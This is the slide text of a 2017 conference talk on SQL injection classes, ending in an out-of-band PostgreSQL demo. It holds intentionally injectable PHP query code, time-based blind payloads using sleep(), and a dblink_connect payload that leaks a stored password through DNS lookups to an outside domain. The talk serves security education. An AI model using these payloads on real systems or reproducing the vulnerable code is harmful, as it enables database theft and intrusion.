Cyprus Cyber Security Conference, Out-of-band SQL Injection Attacks, cypsec.org

1. Out-of-band
SQL Injection Attacks
Cyprus Cyber Security Conference, #CypSec’17
Omer Citak, May 2017

2. whoami
Security Researcher @ Netsparker Ltd.
Developer @ Another Times
Writer @ Ethical Hacking “Offensive & Defensive” Book
Blog: omercitak.com
All Social Platform: @Om3rCitak

3. sql injection
● Inband
○ Error Based
● Indirect Inference
○ Boolean Based
○ Blind (Time Based)
● Out-of-band
○ Blind (HTTP, DNS)

4. sql injection
● Inband
○ Error Based
....
ini_set('display_errors', 'On');
error_reporting(E_ALL);
$sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
$results = mysql_query($sql);
...

5. sql injection
● Inband
○ Error Based

6. sql injection
● Indirect Inference
○ Boolean Based
....
ini_set('display_errors', 'Off');
error_reporting(~E_ALL);
$sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
$results = mysql_query($sql);
$row_count = mysql_num_rows($results);
if($row_count > 0)
echo 'user exist';
else
echo 'user not exist';
...

7. sql injection
● Indirect Inference
○ Boolean Based

8. sql injection
● Indirect Inference
○ Blind (Time Based)
....
ini_set('display_errors', 'Off');
error_reporting(~E_ALL);
$sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'";
$results = mysql_query($sql);
...

9. sql injection
● Indirect Inference
○ Blind (Time Based)

10. sql injection
● Indirect Inference
○ Blind (Time Based)
payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --

11. sql injection
● Indirect Inference
○ Blind (Time Based)
payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --

12. sql injection
● Out-of-band
○ Blind (HTTP, DNS)
....
ini_set('display_errors', 'Off');
error_reporting(~E_ALL);
$sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')";
$results = pg_query($sql);
...

13. demo
● dependencies;
○ 1 DNS server => 207.154.221.107
■ Ubuntu 16
■ Spiderlab Responder
○ 1 app & database server => 46.101.229.160
■ Ubuntu 16
■ Php7
■ Postgresql 9.5
and 1 unit attacker

14. demo
SELECT *
FROM users
WHERE (username like '%".$_GET["param"]."%')

15. demo
SELECT *
FROM users
WHERE (username like '% '||'test'||'%')

16. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(test as numeric)
||'%')

17. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(test) as numeric)
||'%')

18. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect()) as numeric)
||'%')

19. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a
connect_timeout=2')) as numeric)
||'%')

20. demo
SELECT *
FROM users
WHERE (username like '% '||
cast(SELECT(dblink_connect('host='||(select password from users where
id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric)
||'%')

21. demo

22. where is the guvenlik?

23. thanks
www.omercitak.com
All Social Platform: @Om3rCitak